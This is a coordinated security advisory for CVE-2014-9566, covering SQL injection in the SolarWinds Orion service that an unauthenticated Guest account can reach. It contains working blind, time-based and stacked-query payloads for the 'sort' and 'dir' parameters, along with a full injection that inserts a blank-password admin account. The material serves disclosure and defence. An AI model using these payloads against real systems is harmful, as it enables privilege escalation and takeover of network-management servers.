Solarwinds Orion Service SQL Injection

`I found a couple SQL injection vulnerabilities in the core Orion service  
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This  
service provides a consistent configuration and authentication layer across  
the products.  
  
To be exact, the vulnerable applications and versions are:  
  
Network Performance Monitor -- < 11.5  
NetFlow Traffic Analyzer -- < 4.1  
Network Configuration Manager -- < 7.3.2  
IP Address Manager -- < 4.3  
User Device Tracker -- < 3.2  
VoIP & Network Quality Manager -- < 4.2  
Server & Application Monitor -- < 6.2  
Web Performance Monitor -- < 2.2  
  
At first glance, the injections are only available to admins, as the  
requests used are on the Manage Accounts page. However, it seems there is  
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the  
AccountManagement.asmx service, which means that even authenticating as  
Guest allows for exploitation. By default, the Guest account has no  
password and is enabled.  
  
On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and  
'dir' parameters are susceptible to boolean-/time-based, and stacked  
injections. By capturing the AJAX requests made by an admin user to these  
endpoints, authenticating as Guest and replacing the admin cookie with the  
Guest cookie, you can still make a successful request, and thus a  
successful exploitation vector for any authenticated user.  
  
Being a stacked injection, this becomes a privilege escalation at the very  
least, as an attacker is able to insert their own admin user. A pull  
request for a Metasploit module which should achieve this on any product  
using the Orion service as the core authentication management system, using  
the GetAccounts endpoint, has been made (  
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the  
module attempts to authenticate as the Guest user with a blank password,  
then exploit the SQL injection to insert a new admin with a blank password.  
  
I am not sure if the non-trial versions allow you to specify your own SQL  
server, but the trials install a SQL Server Express instance. The SQL user  
that the application uses is not an administrator, and the xp_cmd_shell  
stored procedure is unavailable.  
  
Within the GetAccounts endpoint:  
  
Parameter: dir (GET)  
  
Type: boolean-based blind  
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause  
Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)  
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM  
master..sysdatabases) END))  
  
Type: stacked queries  
Title: Microsoft SQL Server/Sybase stacked queries  
Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--  
  
Type: AND/OR time-based blind  
Title: Microsoft SQL Server/Sybase time-based blind  
Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--  
  
  
Parameter: sort (GET)  
  
Type: boolean-based blind  
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter  
replace (original value)  
Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN  
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)  
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC  
  
Type: stacked queries  
Title: Microsoft SQL Server/Sybase stacked queries  
Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC  
  
Type: AND/OR time-based blind  
Title: Microsoft SQL Server/Sybase time-based blind  
Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC  
  
  
  
Within the GetAccountGroups endpoint, very similar injection techniques are  
available:  
  
Parameter: dir (GET)  
  
Type: boolean-based blind  
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause  
Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN  
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM  
master..sysdatabases) END))  
  
Type: stacked queries  
Title: Microsoft SQL Server/Sybase stacked queries  
Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--  
  
Type: AND/OR time-based blind  
Title: Microsoft SQL Server/Sybase time-based blind  
Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--  
  
  
Parameter: sort (GET)  
  
Type: boolean-based blind  
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter  
replace (original value)  
Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN  
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)  
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC  
  
Type: stacked queries  
Title: Microsoft SQL Server/Sybase stacked queries  
Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC  
  
Type: AND/OR time-based blind  
Title: Microsoft SQL Server/Sybase time-based blind  
Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC  
  
  
An example injection to insert an admin user named notadmin with a blank  
password using the 'dir' parameter would be:  
  
ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',  
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',  
'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,  
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',  
0, '');  
  
This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was  
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of  
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,  
Group Product Manager – Network Management at Solarwinds for the easy  
coordination (you should still have a bug bounty though!).  
  
i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?  
  
i dub thee Molarfriends vulnerability. wheres my markketing tem...  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`